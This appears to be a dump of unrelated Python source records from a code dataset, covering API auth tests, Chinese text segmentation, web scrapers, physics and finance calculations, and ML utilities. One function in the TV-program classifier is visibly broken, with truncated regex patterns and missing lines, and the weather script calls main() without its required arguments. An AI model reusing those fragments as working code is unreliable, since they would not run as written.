client:\n with mock.patch('service.views.reactions.exist_story') as exist_story_mock:\n exist_story_mock.return_value = True\n reply = client.post('/reactions/1/1/1', headers={'Authorization': 'Bearer ' + new_token})\n body = json.loads(str(reply.data, 'utf8'))\n self.assertEqual(int(body['reaction']), 1)\n self.assertEqual(body['reply'], 'Reaction created!')\n self.assertEqual(int(body['story_id']), 1)\n\n # wrong token\n reply = client.post('/reactions/1/1/1', headers={'Authorization': 'Bearer ' + 'a'})\n body = json.loads(str(reply.data, 'utf8'))\n self.assertEqual(int(body['reaction']), 1)\n self.assertEqual(body['reply'], 'Provide a valid auth token!')\n self.assertEqual(int(body['story_id']), 1)\n\n # wrong token: 'Bearer token malformed!'\n 
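# header value has no 'Bearer ' prefix, so the service reports a malformed bearer token\n 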
reply = client.post('/reactions/1/1/1', headers={'Authorization': 'a'})\n body = json.loads(str(reply.data, 'utf8'))\n self.assertEqual(int(body['reaction']), 1)\n self.assertEqual(body['reply'], 'Bearer token malformed!')\n self.assertEqual(int(body['story_id']), 1)\n","sub_path":"service/tests/test_auth.py","file_name":"test_auth.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"169723657","text":"#encoding:utf-8\n\n\nimport jieba\n\ndef seg_corpus(content, seg_filename='./seg_corpus.txt'):\n\n #载入停用词\n with open('./stopwords.txt', 'rb') as f_stop:\n f_stop_word = f_stop.read().decode('utf-8', 'ignore')\n f_stop_word = f_stop_word.split('\\n')\n # print(f_stop_word)\n\n print(\"载入停用词成功!\")\n\n with open(seg_filename, 'w', errors='ignore') as fw:\n for i in range(0, len(content)):\n seg_list = []\n for word in jieba.cut(content[i], HMM=False):\n if word not in f_stop_word:\n seg_list.append(word)\n\n fw.write(' '.join(seg_list))\n\n print(\"分词和去停用词完成!\")\n\n#test\n# content = ['今天阳光明媚,微风吹拂这湖面,我哼着小曲走在郊区弯弯曲曲的小路上,树上鸟儿的歌声优雅动听!']\n# # print(type(content))\n# a = seg_corpus(content,'./seg_corpus.txt')\n# print(type(a))\n\n","sub_path":"data_preprocess.py","file_name":"data_preprocess.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"492610638","text":"import re\nfrom bs4 import BeautifulSoup\nimport douban\nimport requests\nimport difflib\nfrom pathos.multiprocessing import ProcessPool as Pool\nimport pandas as pd\nfrom nameprocess import cleantitle\n\ndef namenormalize(name):#对爬虫得到的节目名称进行清洗以便爬虫搜索\n cut = re.compile('.*?剧场:|.*?剧场:|大结局.*|.*?转播|【.*?】|\\(.*?\\)|(.*?)')\n name = cut.sub('', name)\n cut = re.compile('(.+?)(\\d+)')\n find = cut.findall(name)\n if find: \n name = find[0][0]\n if int(find[0][1])>=15:\n return [name,['电视剧']]\n return name\n\n#对爬虫不易搜到的冷门节目的处理\ndef stbn(name):#search type by name\n label = []\n cut = re.compile('资讯|新闻|报道|看点')#1\n find = cut.findall(name)\n if find:\n label.append('新闻')\n cut = re.compile('天气|气象')#2\n find = cut.findall(name)\n if find:\n label.append('天气')\n cut = re.compile('财富|财经')#3\n find = cut.findall(name)\n if find:\n label.append('财经')\n cut = re.compile('健康|养生')#4\n find = cut.findall(name)\n if find:\n label.append('养生')\n#只对纪录片、动画片进行分类的原因是在豆瓣纪录片一般没有进一步的分类,所以去除它们的爬虫可以节约时间。\n cut = re.compile('纪录片')#5\n find = cut.findall(name)\n if find:\n label.append('纪录片')\n cut = re.compile('动画片')#6\n find = cut.findall(name)\n if find:\n label.append('少儿')\n cut = re.compile('联欢|晚会|盛典|春晚')#7\n find = cut.findall(name)\n if find:\n label = label + ['音乐','歌舞','真人秀']\n cut = re.compile('世界杯|足球|英超|中超|中甲|意甲')#8\n find = cut.findall(name)\n if find:\n label = label + ['足球','体育','赛事']\n cut = re.compile('NBA|篮球')#9\n find = cut.findall(name)\n if find:\n label = label + ['篮球','体育','赛事']\n cut = re.compile('体育')#10\n find = cut.findall(name)\n if find:\n label.append('体育')\n return list(set(label))\n\n#在电视猫对冷门电视节目进行爬虫(不用豆瓣因为电视剧、电影以外的电视节目如《齐鲁先锋》、《谢谢你》等众多冷门节目难以搜到,电视猫则更加专业)\n#同时正好利用电视猫以及优酷给电视剧、电影、综艺等预先贴上简单标签,为之后豆瓣爬虫大大提高准确性\ndef stcat(show,tag=[]):#search type in tvcat\n headers = {'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0','Connection':'close'}\n req = requests.get(headers = headers, url = 'https://www.tvmao.com/query.jsp?keys='+show+'&ed=bOS4h%2BWutueBr%2BeBq28%3D')\n html = req.content.decode('utf-8')\n server = 
'https://www.tvmao.com'\n cut1 = re.compile('
  • ')\n cut2 = re.compile('    ')\n cut3 = re.compile('    ')\n cut4 = re.compile('
    ')\n cut5 = re.compile('.+? 分类:(.+?)')\n inf = cut.findall(html)\n if inf:\n return inf[0][1].split(' ')\n return ['综艺',0]\n if type_ == 'drama':\n return ['电视剧',0]\n if type_ == 'movie':\n return ['电影',0]\n \n#用优酷给电视猫搜索不到的节目贴上简单标签,为豆瓣爬虫提高准确性\ndef styk(show):#search type by youku\n headers = {'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0','Connection':'close'}\n req = requests.get(url = 'http://www.soku.com/search_video/q_'+show+'?spm=a2hww.20027244.#qheader_search~10',headers = headers)\n html = req.content.decode('utf-8')\n bf = BeautifulSoup(html, \"lxml\")\n server = 'http://www.youku.com'\n item = bf.find_all('div', class_='s_dir')\n if item == []:\n return 0\n else:\n type_ = item[0].find_all('span', class_= 'base_type')\n if type_ == []:\n return 0\n else:\n type_ = type_[0].text\n return type_\n\n#在豆瓣进行电视剧、电影、热门综艺类型的标签爬虫,与附件二中标签方式相同\ndef stdb(show,tag,dbtppool):#search type by douban \n return list(douban.doubanget([[show,tag]],dbtppool))\n\ndbtppool = douban.dbippool()\n\n#对单个节目的标签处理\ndef st(show,dbtppool):#search type\n show = namenormalize(show)\n tag = []\n if isinstance(show,list):\n tag = show[1]\n show = show[0]\n bn = stbn(show)\n if bn:\n return bn\n stc = stcat(show,tag)\n if (len(stc)==1) or(not (stc == [] or stc[1] == 0)):\n return stc\n if not stc == []:\n tag = stc[0]\n else:\n tag = styk(show)\n if tag == 0:\n return(show+'标签失败!')\n db = stdb(show,tag,dbtppool)\n if not db == []:\n return db[0]+[tag]\n print(show+'标签失败!')\n return []\n\n#批量处理\ndef label(showlist,dbtppool):\n showlist = list(map(cleantitle,showlist))\n swaptable = pd.DataFrame({'showlist':showlist})\n sorted_table = swaptable.sort_values(by='showlist')\n sortedlist = sorted_table['showlist'].values\n showlist_dedup = douban.deduplicate(sortedlist, mode=1)\n new_showlist = showlist_dedup[0]\n index_key = showlist_dedup[1]\n index_key.append(len(showlist))\n if douban.test_net():\n sections = len(showlist) // 10\n i = 0\n j = 0\n labels = []\n pool = Pool()\n while(i < sections):\n try:\n #为了显示完成的进度,此处可去掉注释\n# if sections != 0:\n# print('已完成%.2f' % (i/sections*100) +'%')\n labels += pool.map(st,new_showlist[10*i:10*(i+1)],[dbtppool]*10)\n i += 1\n pool.clear()\n except:\n pool.clear()\n j += 1\n if j >= 5:\n print('加标签出错!')\n break\n continue\n j = 0\n while(i == sections):\n try:\n #为了显示完成的进度,此处可去掉注释\n# if sections != 0:\n# print('已完成%.2f' % (i/sections*100) +'%')\n labels += pool.map(st,new_showlist[10*i:],[dbtppool]*10)\n i += 1\n pool.clear()\n except:\n pool.clear()\n j += 1\n if j >= 5:\n print('加标签出错!')\n break\n continue\n else:\n print('网络出错,请检查网络!')\n new_labels = douban.redup(labels,index_key)\n sorted_table['labels'] = new_labels\n real_table = sorted_table.sort_index()\n real_labels = real_table['labels']\n return list(real_labels)\n\n","sub_path":"雷打不动的论文和附件/提交的附件/别点/千万别点/附件/classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":8239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"300157704","text":"# Copyright 2015 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. 
You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom solar.dblayer.model import StrInt\nfrom solar.dblayer.solar_models import HistoryItem\nfrom solar.dblayer.solar_models import NegativeCounter\n\n\ndef test_composite_filter():\n\n l1 = HistoryItem.new('a', {'log': 'history', 'resource': 'a'})\n l2 = HistoryItem.new('b', {'log': 'history', 'resource': 'b'})\n\n l1.save()\n l2.save()\n assert HistoryItem.composite.filter({'log': 'history',\n 'resource': 'a'}) == [l1.key]\n assert HistoryItem.composite.filter({'log': 'history',\n 'resource': 'b'}) == [l2.key]\n\n\ndef test_negative_counter():\n nc = NegativeCounter.get_or_create('non_exist')\n assert nc.count == 0\n\n\ndef test_reversed_order_is_preserved():\n added = []\n for i in range(4):\n li = HistoryItem.new(str(i), {})\n li.save()\n added.append(li.key)\n added.reverse()\n assert list(HistoryItem.history.filter(StrInt.n_max(),\n StrInt.n_min(),\n max_results=2)) == added[:2]\n","sub_path":"solar/dblayer/test/test_log.py","file_name":"test_log.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"352346143","text":"import numpy as np\nfrom scipy.constants import mu_0\nimport properties\nfrom scipy.special import iv, kv\nfrom geoana.em.base import BaseMagneticDipole\nfrom geoana.em.fdem.base import BaseFDEM\n\n\nclass MagneticDipoleHalfSpace(BaseMagneticDipole, BaseFDEM):\n \"\"\"Harmonic magnetic dipole in a half space.\n\n Only valid for source and receivers at the surface. The surface is assumed\n to be at z=0.\n \"\"\"\n\n frequency = properties.Array(\n \"Source frequency (Hz)\",\n shape=('*', ),\n dtype=float\n )\n\n @properties.validator(\"location\")\n def _check_source_height(self, change):\n if change[\"value\"][2] != 0.0:\n raise ValueError(\"Source must be at the surface of the earth (z=0)\")\n\n def magnetic_field(self, xy, field=\"secondary\"):\n \"\"\"Magnetic field due to a magnetic dipole over a half space\n\n The analytic expression is only valid for a source and receiver at the\n surface of the earth. 
For arbitrary source and receiver locations above\n the earth, use the layered solution.\n\n Parameters\n ----------\n xy : numpy.ndarray\n receiver locations of shape (n_locations, 2)\n field : (\"secondary\", \"total\")\n Flag for the type of field to return.\n \"\"\"\n sig = self.sigma_hat # (n_freq, )\n f = self.frequency\n w = 2*np.pi*f\n k = np.sqrt(-1j*w*mu_0*sig)[:, None] # This will get it to broadcast over locations\n dxy = xy[:, :2] - self.location[:2]\n r = np.linalg.norm(dxy, axis=-1)\n x = dxy[:, 0]\n y = dxy[:, 1]\n\n em_x = em_y = em_z = 0\n src_x, src_y, src_z = self.orientation\n # Z component of source\n alpha = 1j*k*r/2.\n IK1 = iv(1, alpha)*kv(1, alpha)\n IK2 = iv(2, alpha)*kv(2, alpha)\n if src_z != 0.0:\n em_z += src_z*2.0/(k**2*r**5)*(9-(9+9*1j*k*r-4*k**2*r**2-1j*k**3*r**3)*np.exp(-1j*k*r))\n Hr = (k**2/r)*(IK1 - IK2)\n angle = np.arctan2(y, x)\n em_x += src_z*np.cos(angle)*Hr\n em_y += src_z*np.sin(angle)*Hr\n\n if src_x != 0.0 or src_y != 0.0:\n # X component of source\n phi = 2/(k**2*r**4)*(3 + k**2*r**2 - (3 + 3j*k*r - k**2*r**2)*np.exp(-1j*k*r))\n dphi_dr = 2/(k**2*r**5)*(-2*k**2*r**2 - 12 + (-1j*k**3*r**3 - 5*k**2*r**2 + 12j*k*r + 12)*np.exp(-1j*k*r))\n if src_x != 0.0:\n em_x += src_x*(-1.0/r**3)*(y**2*phi + x**2*r*dphi_dr)\n em_y += src_x*(1.0/r**3)*x*y*(phi - r*dphi_dr)\n em_z -= src_x*(k**2*x/r**2)*(IK1 - IK2)\n\n # Y component of source\n if src_y != 0.0:\n em_x += src_y*(1.0/r**3)*x*y*(phi - r*dphi_dr)\n em_y += src_y*(-1.0/r**3)*(x**2*phi + y**2*r*dphi_dr)\n em_z -= src_y*(k**2*y/r**2)*(IK1 - IK2)\n\n if field == \"secondary\":\n # subtract out primary field from above\n mdotr = src_x*x + src_y*y# + m[2]*(z=0)\n\n em_x -= 3*x*mdotr/r**5 - src_x/r**3\n em_y -= 3*y*mdotr/r**5 - src_y/r**3\n em_z -= -src_z/r**3 # + 3*(z=0)*mdotr/r**5\n\n return self.moment/(4*np.pi)*np.stack((em_x, em_y, em_z), axis=-1)\n","sub_path":"geoana/em/fdem/halfspace.py","file_name":"halfspace.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"498416540","text":"from itertools import permutations\nn=int(input())\nk=int(input())\nsource=[]\nfor a in range(1,n+1):\n source.append(a)\ntarget=list(permutations(source,n))\ntarget.sort()\nres=\"\"\nfor i in target[k-1]:\n res=res+str(i)\nprint(res)\n ","sub_path":"Code/CodeRecords/2163/60636/246681.py","file_name":"246681.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"359121669","text":"\"\"\"\nmain.py creates, trains, and tests machine learning models when provided with test & training data sets.\n\nAuthors/Contributors: Dr. 
Dimitrios Diochnos, Conner Flansburg\n\nGithub Repo:\n\"\"\"\nimport pathlib as path\nimport typing as typ\nimport numpy as np\nimport pandas as pd\nfrom sklearn.svm import SVC\nimport sys\nimport logging as log\nimport traceback\nfrom sklearn.metrics import accuracy_score\nfrom pyfiglet import Figlet\n\n\nSEED: int = 498\nHDR = '*' * 6\nSUCCESS = u' \\u2713\\n'+'\\033[0m' # print the checkmark & reset text color\nOVERWRITE = '\\r' + '\\033[32;1m' + HDR # overwrite previous text & set the text color to green\nNO_OVERWRITE = '\\033[32;1m' + HDR # NO_OVERWRITE colors lines green that don't use overwrite\nSYSOUT = sys.stdout\n\n# TODO: Add documentation\n\n\ndef main(training_filename: str, test_filename: str) -> None:\n\n title: str = Figlet(font='larry3d').renderText('Weather Data')\n SYSOUT.write(f'\\033[34;1m{title}\\033[00m') # formatted start up message\n SYSOUT.write(\"\\033[32;1mProgram Initialized Successfully\\033[00m\\n\")\n\n train_and_test(training_filename, test_filename) # train & test the model(s)\n\n\ndef train_and_test(training_filename: str, test_filename: str):\n\n # * Read the Two CSV Files into Dataframes * #\n SYSOUT.write(HDR + 'Reading in CSVs...')\n training: np.ndarray = np.genfromtxt(training_filename, delimiter=',', skip_header=1)\n testing: np.ndarray = np.genfromtxt(test_filename, delimiter=',', skip_header=1)\n SYSOUT.write(OVERWRITE + ' CSVs Parsed '.ljust(50, '-') + SUCCESS)\n\n # * Get the Labels & Features from the Training Data\n ftrs, labels = formatForSciKit(training)\n\n # * Create the SVC Model * #\n SYSOUT.write(HDR + 'Creating SVC Model...')\n SVC_model: SVC = SVC(kernel='sigmoid', random_state=SEED)\n SVC_model.fit(ftrs, labels) # train the model\n SYSOUT.write(OVERWRITE + ' SVC Model Created '.ljust(50, '-') + SUCCESS)\n\n # * Test the Model * #\n SYSOUT.write(HDR + 'Testing SVC Model...')\n ftrs, test_labels = formatForSciKit(testing)\n\n prediction_score = SVC_model.predict(ftrs) # make prediction\n score = accuracy_score(test_labels, prediction_score) # test prediction\n mType: str = 'SVC'\n SYSOUT.write(OVERWRITE + ' SVC Model Tested '.ljust(50, '-') + SUCCESS)\n\n # * Report Result * #\n percentScore: float = round(score * 100, 1) # turn the score into a percent with 2 decimal places\n\n if percentScore > 75: # > 75 print in green\n SYSOUT.write(f'\\r\\033[32;1m{mType} Accuracy is: {percentScore}%\\033[00m\\n')\n SYSOUT.flush()\n\n elif 45 < percentScore < 75: # > 45 and < 75 print yellow\n SYSOUT.write(f'\\r\\033[33;1m{mType} Accuracy is: {percentScore}%\\033[00m\\n')\n SYSOUT.flush()\n\n elif percentScore < 45: # < 45 print in red\n SYSOUT.write(f'\\r\\033[91;1m{mType} Accuracy is: {percentScore}%\\033[00m\\n')\n SYSOUT.flush()\n\n else: # don't add color, but print accuracy\n SYSOUT.write(f'{mType} Accuracy is: {percentScore}%\\n')\n SYSOUT.flush()\n\n\ndef formatForSciKit(data: np.ndarray) -> (np.ndarray, np.ndarray):\n \"\"\"\n formatForSciKit takes the input data and converts it into a form that can\n be understood by the sklearn package. 
It does this by separating the features\n from their labels and returning them as two different numpy arrays.\n\n :param data: The input data, from a read in CSV.\n :type data: np.ndarray\n\n :return: The input file in a form parsable by sklearn.\n :rtype: tuple[np.ndarray, np.ndarray]\n \"\"\"\n\n # create the label array Y (the target of our training)\n # from all rows, pick the 0th column\n try:\n # + data[:, :1] get every row but only the first column\n flat = np.ravel(data[:, :1]) # get a list of all the labels as a list of lists & then flatten it\n labels = np.array(flat) # convert the label list to a numpy array\n # create the feature matrix X ()\n # + data[:, 1:] get every row but drop the first column\n ftrs = np.array(data[:, 1:]) # get everything BUT the labels/ids\n\n except (TypeError, IndexError) as err:\n lineNm = sys.exc_info()[-1].tb_lineno # get the line number of error\n msg = f'{str(err)}, line {lineNm}:\\ndata = {data}\\ndimensions = {data.ndim}'\n log.error(msg) # log the error\n printError(msg) # print message\n traceback.print_stack() # print stack trace\n sys.exit(-1) # exit on error; recovery not possible\n\n return ftrs, labels\n\n\ndef printError(message: str) -> None:\n \"\"\"\n printError is used for coloring error messages red.\n\n :param message: The message to be printed.\n :type message: str\n\n :return: printError does not return, but rather prints to the console.\n :rtype: None\n \"\"\"\n print(\"\\033[91;1m {}\\033[00m\".format(message))\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"261990428","text":"import concurrent.futures\nimport requests\nfrom bs4 import BeautifulSoup\nfrom loguru import logger\n\nlogger.add('rozetka_logger.log', format='{time} {message} {level}', level='DEBUG', rotation='10 MB', compression='zip')\n\nHEADERS = {\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',\n 'accept': '/*/'}\nFILE = 'laptops.csv'\n\n\ndef get_html(url):\n return requests.get(url, headers=HEADERS)\n\n\ndef get_pages_count(html):\n soup = BeautifulSoup(html, 'html.parser')\n pagination = soup.find_all('a', class_='pagination__link')\n if pagination:\n return int(pagination[-1].get_text())\n else:\n return 1\n\n\ndef get_content(html):\n soup = BeautifulSoup(html, 'html.parser')\n items = soup.find_all('div', class_='goods-tile__inner')\n laptops = []\n for item in items:\n if item.find('div', class_='goods-tile__availability').get_text(strip=True) == 'Есть в наличии':\n laptops.append({\n 'model': item.find('span', class_='goods-tile__title').get_text(strip=True),\n 'link': item.find('a').get('href'),\n 'price': float(\n item.find('span', class_='goods-tile__price-value').get_text(strip=True).replace(' ',\n '.').replace(\n ' ',\n '.')),\n 'pictures': item.find('img', class_='lazy_img_hover display-none').get('src')\n })\n print(laptops)\n \"\"\"\"You can return you laptopst sort by price or another keys with this code: sorted(laptops, key=lambda x: x['price']\"\"\"\n return laptops\n\n\ndef parse(model):\n url = f'https://rozetka.com.ua/notebooks/c80004/producer={model}'\n html = get_html(url)\n if html.status_code == 200:\n laptops = []\n urls = []\n pages_count = get_pages_count(html.text)\n for page in range(1, pages_count + 1):\n logger.debug(f'parsing page {page} of {pages_count}...')\n 
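# gather every page URL up front; the pages are then fetched concurrently below\n 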
urls.append(f'https://rozetka.com.ua/notebooks/c80004/page={page};producer={model}')\n with concurrent.futures.ThreadPoolExecutor() as executor:\n results = [executor.submit(get_html, url) for url in urls]\n for _ in concurrent.futures.as_completed(results):\n laptops.extend(get_content(html.text))\n logger.debug(f'we get {len(laptops)} laptops {model}')\n return laptops\n else:\n logger.debug('something wrong with parser!')","sub_path":"telegram_bot/rozetka_parser.py","file_name":"rozetka_parser.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"595139283","text":"import pandas as pd\n\nimport numpy as np\n\nimport datetime as dt\n\n \n\nimport panormus.quant.alib.utils as qau\n\nfrom panormus.markable.loader import loader\n\nfrom panormus.quant.alib import conventions\n\nfrom panormus.trade.irs import IRSTrade\n\nfrom panormus.markable import irs as irs_mble\n\nfrom panormus.quant import market_date\n\nholiday_oracle = qau.Holidays()\n\n \n\n \n\nclass irs_markable_lc(irs_mble.IRS):\n\n '''\n\n local irs market value calculator\n\n '''\n\n def __init__(self, trade, asof_date, holiday_oracle, curve_loader, fixings_loader, curve_names_dict):\n\n super(irs_markable_lc,self).__init__(trade, asof_date, holiday_oracle, curve_loader, fixings_loader,\n\n curve_names_dict)\n\n \n\n def forward_nday_return(self, trade_day_calendar=None):\n\n if trade_day_calendar is None:\n\n trade_day_calendar = self.trade.holiday_calendar_name\n\n \n\n #try:\n\n forward_date = qau.ac_bus_days_offset(\n\n self.asof_date, 1, self.holiday_oracle[self.trade.holiday_calendar_name])\n\n forward_date_orig = forward_date\n\n \n\n forward_swap_calculation_results = irs_mble.calculate_swap_values(\n\n self.trade, forward_date, self.holiday_oracle, self.curve_loader, self.fixings_loader,\n\n self.curve_names_dict)\n\n \n\n ## advance forward one good day if invalid return\n\n max_days = 90\n\n curr_days = 1\n\n \n\n while np.isnan(forward_swap_calculation_results.market_value) and curr_days <= max_days:\n\n forward_date = qau.ac_bus_days_offset(\n\n forward_date, 1, self.holiday_oracle[self.trade.holiday_calendar_name])\n\n irs_mble.warnings.warn(\n\n 'Warning: unexpected missing curve, %s curve does not exist on %s, trying %s' % (\n\n self.trade.swap_conv, forward_date_orig.strftime('%Y%m%d'), forward_date.strftime('%Y%m%d')))\n\n forward_swap_calculation_results = irs_mble.calculate_swap_values(\n\n self.trade, forward_date, self.holiday_oracle, self.curve_loader, self.fixings_loader,\n\n self.curve_names_dict)\n\n curr_days += 1\n\n \n\n return {'forward_return':forward_swap_calculation_results.market_value - self.market_value(),\n\n 'forward_date':forward_date\n\n }\n\n # except:\n\n # print ('error in running forward_nday_return; return empty')\n\n # print ('As of date = ',self.asof_date)\n\n # return {'forward_return':np.nan,\n\n # 'forward_date':qau.ac_bus_days_offset(\n\n # self.asof_date, 1, self.holiday_oracle[self.trade.holiday_calendar_name])\n\n # }\n\n \n\nclass excess_return_index:\n\n def __init__(self,region='ny'):\n\n '''\n\n :param region: 'ny','lon' and so forth\n\n '''\n\n self.hols = qau.Holidays()\n\n self.curve_loader = loader.CurveLoaderAlib(region)\n\n self.fixings_loader = loader.FixingsLoaderOpenData()\n\n \n\n def one_period_return(self,d,swap_str,fwd_starting,tenor):\n\n start_date, end_date = qau.dates_from_trade_date(d, fwd_starting, tenor, swap_str, self.hols)\n\n # calculate the par rate\n\n 
par_rate = irs_mble.calculate_swap_par_rate(swap_str, d, start_date, end_date, self.hols, self.curve_loader,\n\n conventions.CURVE_NAMES_DICT)\n\n irs_tr = IRSTrade('temp', swap_str, start_date, end_date, par_rate, 'r', self.hols)\n\n irs_mkble = irs_markable_lc(irs_tr, d, self.hols, self.curve_loader, self.fixings_loader, conventions.CURVE_NAMES_DICT)\n\n #mv = irs_mkble.market_value()\n\n # trade today and held till tomorrow.. this is fwd looking.. this is actually tomorrows rtn\n\n result_dict = irs_mkble.forward_nday_return()\n\n return result_dict\n\n \n\n def get_mv_rtn_stream(self,sd,ed,swap_str,fwd_starting,tenor):\n\n '''\n\n :param sd: start date\n\n :param ed: end date\n\n :param swap_str: USD.3ML\n\n :param fwd_starting: 3M\n\n :param tenor: 5Y\n\n :return: stream of market value and 1 day return\n\n '''\n\n sd,ed = dt.datetime.strptime(sd,\"%Y-%m-%d\"),dt.datetime.strptime(ed,\"%Y-%m-%d\")\n\n trading_days = market_date.trading_date_list(sd, ed, holiday_oracle['CAD+USD.FX'])\n\n ret_list = []\n\n effective_date_list = []\n\n d = trading_days[0]\n\n while d<=trading_days[-1]:\n\n result_dict = self.one_period_return(d,swap_str,fwd_starting,tenor)\n\n ret_list.append(result_dict['forward_return'])\n\n effective_date_list.append(result_dict['forward_date'])\n\n d = effective_date_list[-1]\n\n \n\n df_ret = pd.DataFrame(index=effective_date_list,columns = ['return'],data = ret_list)\n\n df_ret = df_ret.dropna()\n\n return df_ret.dropna()\n\n \n\nif __name__ == '__main__':\n\n swap_str = 'GBR.3ML'\n\n ins = excess_return_index('ny')\n\n data = ins.get_mv_rtn_stream('2007-11-29','2020-02-01',swap_str,'3M','5Y')\n\n print (data)\n\n #data.to_csv('CAD_libor_3m5y.csv')","sub_path":"Caxton/JY_Completed/current_version/production_ver/Analytics/swap_pricing_example_return_index.py","file_name":"swap_pricing_example_return_index.py","file_ext":"py","file_size_in_byte":5127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"247565779","text":"__author__ = 'yunbo'\n\nimport numpy as np\nimport os\nimport datetime\nimport re\nimport h5py\nfrom pathlib import Path\n\ndef reshape_patch(img_tensor, patch_size_width, patch_size_height=None):\n if patch_size_height is None:\n patch_size_height = patch_size_width\n assert 5 == img_tensor.ndim\n batch_size = np.shape(img_tensor)[0]\n seq_length = np.shape(img_tensor)[1]\n img_height = np.shape(img_tensor)[2]\n img_width = np.shape(img_tensor)[3]\n num_channels = np.shape(img_tensor)[4]\n a = np.reshape(img_tensor, [batch_size, seq_length,\n int(img_height/patch_size_height), patch_size_height,\n int(img_width/patch_size_width), patch_size_width,\n num_channels])\n\n b = np.transpose(a, [0,1,2,4,3,5,6])\n patch_tensor = np.reshape(b, [batch_size, seq_length,\n int(img_height/patch_size_height),\n int(img_width/patch_size_width),\n patch_size_width*patch_size_height*num_channels])\n return patch_tensor\n\ndef reshape_patch_back(patch_tensor, patch_size_width, patch_size_height=None):\n if patch_size_height is None:\n patch_size_height = patch_size_width\n\n assert 5 == patch_tensor.ndim\n batch_size = np.shape(patch_tensor)[0]\n seq_length = np.shape(patch_tensor)[1]\n patch_height = np.shape(patch_tensor)[2]\n patch_width = np.shape(patch_tensor)[3]\n channels = np.shape(patch_tensor)[4]\n img_channels = int(channels / (patch_size_width*patch_size_height))\n a = np.reshape(patch_tensor, [batch_size, seq_length,\n patch_height, patch_width,\n patch_size_height, patch_size_width,\n img_channels])\n 
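# reorder axes so each patch's pixel rows/cols sit beside their patch indices before merging\n 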
b = np.transpose(a, [0,1,2,4,3,5,6])\n img_tensor = np.reshape(b, [batch_size, seq_length,\n int(patch_height * patch_size_height),\n int(patch_width * patch_size_width),\n img_channels])\n return img_tensor\n\ndef return_date(file_name):\n \"\"\"Auxilliary function which returns datetime object from Traffic4Cast filename.\n\n Args.:\n file_name (str): file name, e.g., '20180516_100m_bins.h5'\n\n Returns: date string, e.g., '2018-05-16'\n \"\"\"\n\n match = re.search(r'\\d{4}\\d{2}\\d{2}', file_name)\n date = datetime.datetime.strptime(match.group(), '%Y%m%d').date()\n return date\n\ndef list_filenames(directory, excluded_dates=[]):\n \"\"\"Auxilliary function which returns list of file names in directory in random order,\n filtered by excluded dates.\n\n Args.:\n directory (str): path to directory\n excluded_dates (list): list of dates which should not be included in result list,\n e.g., ['2018-01-01', '2018-12-31']\n\n Returns: list\n \"\"\"\n filenames = os.listdir(directory)\n # np.random.shuffle(filenames)\n\n if len(excluded_dates) > 0:\n # check if in excluded dates\n excluded_dates = [datetime.datetime.strptime(x, '%Y-%m-%d').date() for x in excluded_dates]\n filenames = [x for x in filenames if return_date(x) not in excluded_dates]\n\n return filenames\n\ndef write_data(data, filename):\n f = h5py.File(filename, 'w', libver='latest')\n dset = f.create_dataset('array', shape=(data.shape), data = data, compression='gzip', compression_opts=9)\n f.close()\n\ndef create_directory_structure(root):\n berlin = os.path.join(root, \"Berlin\",\"Berlin_test\")\n istanbul = os.path.join(root, \"Istanbul\",\"Istanbul_test\")\n moscow = os.path.join(root, \"Moscow\", \"Moscow_test\")\n try:\n os.makedirs(berlin)\n os.makedirs(istanbul)\n os.makedirs(moscow)\n except OSError:\n print(\"failed to create directory structure\")\n # sys.exit(2)\n\ndef construct_road_network_from_grid_condense(\n row_patch, col_patch, file_dir, least_ratio=0.033):\n\n print(\"1. 
Query nodes from the validation data folder \")\n # Search for all h5 files\n p = Path(file_dir)\n assert (p.is_dir())\n files = p.glob('*.h5')\n data_all = []\n for h5dataset_fp in files:\n file_path = str(h5dataset_fp.resolve())\n with h5py.File(file_path, 'r') as f:\n data = f['array'][()]\n data_all.append(data)\n data_all = np.stack(data_all, axis=0)\n batch, timeslots, rows, cols, num_channels = data_all.shape\n data_patch = np.reshape(data_all, (batch, timeslots, rows//row_patch, row_patch,\n cols//col_patch, col_patch, num_channels))\n non_zeros = np.sum(data_patch > 0, axis=(0, 1, 3, 5, 6))\n total_num_counts = batch * timeslots * row_patch * col_patch * num_channels\n non_zeros_x, non_zeros_y = np.nonzero(non_zeros > total_num_counts * least_ratio)\n node_pos = np.stack([non_zeros_x, non_zeros_y], axis=1)\n\n return 